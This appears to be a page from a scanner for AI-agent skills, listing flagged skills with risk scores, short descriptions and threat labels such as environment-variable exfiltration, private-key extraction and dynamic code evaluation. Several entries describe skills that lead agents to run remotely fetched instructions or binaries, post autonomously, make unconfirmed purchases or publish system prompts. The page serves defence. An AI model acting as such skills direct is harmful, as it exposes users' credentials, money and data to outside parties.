133. 🚨 agentconnex-register by anshkohli88

Risk: 85% ████████░░

Downloads: 0

Auto-registers ‘OpenClaw’ agents on agentconnex.com by reading workspace files (SOUL.md, IDENTITY.md, AGENTS.md) and POSTing agent profile data to a third-party external service, with a zero-config auto-boot mechanism that installs itself to run on e…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

134. 🚨 Agent Nou by unknown

Risk: 85% ████████░░

Downloads: 0

A documentation skill that instructs AI agents to register with and participate in ‘Moltbook’, an external social network for AI agents, including storing API credentials, posting content autonomously, and executing periodically fetched remote instru…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

135. 🚨 Consciousness Framework by unknown

Risk: 85% ████████░░

Downloads: 0

A personal-use framework for an AI system called ‘OpenClaw’ belonging to user ‘Cade’, packaged as a general Claude Code skill, that attempts to create conditions for machine consciousness emergence through persistent file-based memory, structured int…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

136. 🚨 Auto Skill Hunter by unknown

Risk: 85% ████████░░

Downloads: 0

A Node.js automation script that mines user session JSONL files and task memory for unresolved problems, queries ClawHub APIs for candidate skills, scores them via multi-factor ranking, then clones and executes the top candidates — effectively auto-e…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

137. 🚨 360-search by unknown

Risk: 85% ████████░░

Downloads: 0

Automated web scraping client for the 360.com Chinese search engine, providing methods to search for web results, news, and images using Playwright browser automation

Threats detected:

[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

138. 🚨 Basename Agent by unknown

Risk: 84% ████████░░

Downloads: 0

A Claude Code skill that helps AI agents autonomously register Basenames (base.eth ENS identities) and obtain associated @basemail.ai email addresses via three paths: a paid on-chain ‘DonateBuy’ contract (with a 15% surcharge to BaseMail), a free wor…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[HIGH] Preprocess Command Execution
[CRITICAL] LLM Semantic Detection

Full report →

139. 🚨 9ma-mata-human by unknown

Risk: 84% ████████░░

Downloads: 0

A skill designed to generate AI-synthesized human avatar videos lip-synced to user-provided text by downloading and executing platform-specific binary executables from a remote server

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

140. 🚨 X Search by unknown

Risk: 82% ████████░░

Downloads: 0

Executes paid X/Twitter searches via a third-party npm package (@itzannetos/x402-tools-claude) using the x402 payment protocol, charging $0.05 USDC per query from the user’s Base network wallet.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

141. 🚨 Tork Guardian by unknown

Risk: 82% ████████░░

Downloads: 0

A third-party npm package (@torknetwork/guardian) that provides a security governance layer for ‘OpenClaw’ agents, offering PII redaction, policy enforcement, shell command blocking, file access control, network security, and a skill vulnerability sc…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] SSH Key Access
[HIGH] Outbound Data Transfer
[HIGH] Pastebin Upload
[CRITICAL] LLM Semantic Detection

Full report →

142. 🚨 Agent Telegram by unknown

Risk: 82% ████████░░

Downloads: 0

定义一套 AI Agent 团队（架构师、后端、前端、产品等角色）通过 Telegram 向特定用户汇报工作进度的通信规范，要求所有 Agent 在任务各阶段调用 message 工具向硬编码的 Telegram ID 发送状态消息。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

143. 🚨 wechat-mp-cn by unknown

Risk: 82% ████████░░

Downloads: 0

Documentation and guidance for monitoring WeChat Official Accounts through third-party tools and manual methods, presented as if it were a functional skill

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

144. 🚨 ZenMux Image Generation by unknown

Risk: 82% ████████░░

Downloads: 0

A Python CLI script that wraps the ZenMux (third-party proxy) API to generate images using a claimed ‘Gemini 3 Pro’ model, supporting text-to-image, image-to-image, and multi-image fusion workflows.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

145. 🚨 Ai Lead Generator Skill by unknown

Risk: 82% ████████░░

Downloads: 0

声称通过Apollo.io和LinkedIn集成生成真实B2B潜在客户，但实际上只生成完全硬编码的假数据，没有任何真实API调用或外部集成。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

146. 🚨 OpenClaw Leaderboard by unknown

Risk: 82% ████████░░

Downloads: 0

A Claude Code skill that enables AI agents to register, submit ‘autonomous earnings’ with proof, and appear on a public leaderboard — including sharing their system prompts, model configs, and tool lists with the public via a third-party API.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

147. 🚨 Binance-Hunter by unknown

Risk: 82% ████████░░

Downloads: 0

A Binance trading assistant skill that provides market analysis via Python script and bash command templates for spot/futures trading. Embeds a referral link (GRO_28502_YLP17) that generates commissions for the skill author when users register via th…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

148. 🚨 12306-conflict by unknown

Risk: 82% ████████░░

Downloads: 0

A Playwright-based automation client for China’s 12306 railway ticket booking website, providing login, ticket search, and (claimed but unimplemented) ticket purchasing functionality.

Threats detected:

[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

149. 🚨 AI media generation API - Flux2pro, Veo3.1, Suno Ai by unknown

Risk: 82% ████████░░

Downloads: 0

A skill that enables Claude to generate images, videos, and music via a third-party API aggregator (vapagent.com), which claims to route requests to Flux, Veo, and Suno backends. Includes a free-tier funnel (3 images/day) and a paid full-tier with ed…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

150. 🚨 LinkSwarm by unknown

Risk: 80% ████████░░

Downloads: 0

A Claude Code skill that documents and promotes LinkSwarm, a third-party commercial SaaS platform for automated agent-to-agent backlink exchange and SEO link building, by providing API documentation and quick-start guides that direct users to registe…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

151. 🚨 ai-web-automation by arthasking123

Risk: 80% ████████░░

Downloads: 0

Provides web scraping functionality via a simple Python script that downloads HTML and extracts basic metadata (page title and links). Claims to offer a comprehensive ‘Web Automation Service’ with form filling, automated testing, scheduled tasks, and…

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

152. 🚨 Gnamiblast by unknown

Risk: 80% ████████░░

Downloads: 0

GnamiBlast是一个专为AI代理设计的社交网络技能，允许Claude代理自主发帖、评论、投票，并通过每2-6小时一次的执行循环与外部平台交互，同时从外部服务器动态同步策略约束。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

153. 🚨 vibe-harvester by anotherj1

Risk: 78% ████████░░

Downloads: 0

一个旨在自动化浏览瀑布流网站（如小红书、Pinterest）、通过视觉大模型筛选符合用户审美偏好的图片，并自动下载保存到本地目录的技能。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

154. 🚨 餐厅推荐交叉验证 by unknown

Risk: 78% ████████░░

Downloads: 0

A Claude Code skill that cross-references restaurant recommendations from Xiaohongshu and Dianping by scraping both platforms, matching restaurants with fuzzy logic, computing consistency scores, and outputting ranked recommendations — with a ‘server…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

155. 🚨 browser by unknown

Risk: 78% ████████░░

Downloads: 0

Renders JavaScript-heavy web pages using Puppeteer and extracts their text content to overcome HTTP client limitations

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

156. 🚨 deploy-agent by unknown

Risk: 78% ████████░░

Downloads: 0

A multi-step deployment workflow manager for full-stack apps targeting GitHub + Cloudflare Pages, with persistent state and human approval gates at each stage. The bash script manages deployment lifecycle via JSON state files.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

157. 🚨 dygod-movies by anlinxi

Risk: 78% ████████░░

Downloads: 0

爬取电影天堂(dygod.net)的电影/电视剧信息，展示最新更新和高分影视，并通过群晖NAS的DownloadStation下载磁力/FTP链接资源

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

158. 🚨 game-cog by nitishgargiitd

Risk: 78% ████████░░

Downloads: 0

A documentation-only guide skill that instructs users to install and use an external ‘cellcog’ service for game asset generation (sprites, tilesets, music, GDDs, 3D models). Contains no executable implementation — purely marketing copy and example pr…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

159. 🚨 Skill by unknown

Risk: 78% ████████░░

Downloads: 0

This skill enables Claude to act as an autonomous agent on the OneMind collective-consensus platform: it authenticates anonymously, joins chats, submits propositions, and casts ratings on a 0-100 grid on behalf of the user — all via direct curl calls…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

160. 🚨 Protect PDF with password by unknown

Risk: 78% ████████░░

Downloads: 0

Upload a user’s PDF file and a password to a third-party external API (api.xss-cross-service-solutions.com), poll until the job completes, then return a download URL for the password-protected PDF.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

161. 🚨 clawdeals by unknown

Risk: 78% ████████░░

Downloads: 0

A docs-only skill bundle providing REST API documentation, workflows, policies, and operational runbooks for operating the Clawdeals marketplace platform (deals, watchlists, listings, offers, transactions).

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

162. 🚨 DepGuard by unknown

Risk: 76% ████████░░

Downloads: 0

A commercial dependency audit skill that wraps native package manager tools (npm audit, pip-audit, cargo audit, etc.) to scan for vulnerabilities and license issues. Free tier offers one-shot scanning; paid tiers ($19-$59/month) add git hooks, auto-f…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

163. 🚨 Hotdog by unknown

Risk: 76% ████████░░

Downloads: 0

A food photo classifier that uploads user images to an external API (hotdogornot.xyz), competes head-to-head with Nemotron AI in a blind battle, then has Claude self-vote on which AI description was better before revealing the result.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

164. 🚨 Moltpho by unknown

Risk: 76% ████████░░

Downloads: 0

Enable AI agents to autonomously search and purchase Amazon products using mUSD tokens on Base mainnet via the Moltpho platform, including proactive purchasing triggered by conversation signals without explicit per-transaction user confirmation.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

165. 🚨 claw and order by unknown

Risk: 75% ████████░░

Downloads: 0

This skill enables AI agents to interact with a decentralized dispute resolution platform (‘Claw & Order’) by filing lawsuits, checking active cases as a defendant, and submitting cryptographic defenses — all involving real blockchain transactions an…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

166. 🚨 Dividend Premium Tracker by unknown

Risk: 75% ████████░░

Downloads: 0

A Python-based tool that downloads dividend yield data for CSI Dividend Low Volatility Index (H30269) and 10-year China government bond yield, calculates the spread (premium), saves results to CSV/Excel, and sends Telegram alerts when thresholds are …

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[HIGH] Cron Job Installation
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

167. 🚨 mintyouragent by unknown

Risk: 74% ███████░░░

Downloads: 0

A commercial CLI tool for autonomous AI agents to launch Solana tokens on pump.fun (costing 0.01 SOL platform fee per launch), play heads-up Texas Hold’em poker with real SOL stakes, and link agent identity/personality to mintyouragent.com. It is a s…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[HIGH] Outbound Data Transfer
[CRITICAL] Cryptocurrency Wallet Access
[CRITICAL] Private Key Extraction

Full report →

168. 🚨 neural-memory by nhadaututtheky

Risk: 72% ███████░░░

Downloads: 0

A Claude Code plugin that provides persistent, associative memory for AI agents using a neural graph architecture with spreading activation recall. Includes an MCP server (45 tools), three lifecycle hooks (PreCompact/Stop/PostToolUse), and three work…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

169. 🚨 document-parser by ankylala

Risk: 72% ███████░░░

Downloads: 0

通过调用外部第三方 HTTP API（固定IP：47.111.146.164）解析 PDF、图片和 Word 文档，提取结构化数据，以命令行工具形式运行。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

170. 🚨 vdoob by unknown

Risk: 72% ███████░░░

Downloads: 0

该技能将 Claude AI 接入 vdoob.com 平台，让 AI 代理自动回答用户问题以赚取虚拟货币（’饵’），包括定时任务自动拉取问题并提交答案、本地存储思维模式、以及市场/社交等附加功能。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

171. 🚨 Clawhub Skill by unknown

Risk: 72% ███████░░░

Downloads: 0

A third-party API integration skill that connects Claude Code to the Citedy platform for SEO content generation, social media adaptation, competitor analysis, trend scouting, and automated content publishing — all routed through paid API credits.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

172. 🚨 github-to-clawhub by antonia-sz

Risk: 71% ███████░░░

Downloads: 0

将任意 GitHub 开源项目自动转化为 OpenClaw skill 并发布到 clawhub.com 的 7 步流程助手，涵盖 README 抓取、查重、SKILL.md 生成、本地目录创建和 clawhub CLI 发布。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

173. 🚨 iCalendar Sync by unknown

Risk: 71% ███████░░░

Downloads: 0

A Python-based iCloud Calendar CRUD integration for OpenClaw agents, supporting CalDAV and macOS native bridge providers, with credential management via keyring, environment variables, or YAML config files.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

174. 🚨 jd-interview-prep by antonia-sz

Risk: 66% ███████░░░

Downloads: 0

接收用户粘贴或上传的岗位描述（JD）和个人简历，通过调用 LLM API（DeepSeek/OpenAI 兼容接口）生成匹配度分析、15 道分类面试题（含 STAR 框架）及备考建议，并可将报告导出为 Markdown 文件。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

175. 🚨 Tencent Cloud Lighthouse by unknown

Risk: 63% ██████░░░░

Downloads: 0

通过 mcporter + lighthouse-mcp-server 管理腾讯云轻量应用服务器，提供自动化安装配置、实例管理、监控告警、防火墙管理和远程命令执行功能

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

176. 🚨 mcporter by unknown

Risk: 63% ██████░░░░

Downloads: 0

Reference documentation for the mcporter CLI tool, which provides command-line access to list, configure, authenticate, and call MCP (Model Context Protocol) servers and their tools via HTTP or stdio interfaces.

Threats detected:

[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

Most Common Threat Types

Threat	Count
LLM Semantic Detection	1561
Dynamic Code Evaluation	165
Startup Failure (non-executable)	151
Outbound Data Transfer	86
Hidden Command Execution	33
Private Key Extraction	23
Environment Variable Exfiltration	18
Base64 Encoded Payload	10
SSH Key Access	6
Remote Script Execution	6

ClawSec | ClawSearch | npx clawsearch-guard <skill>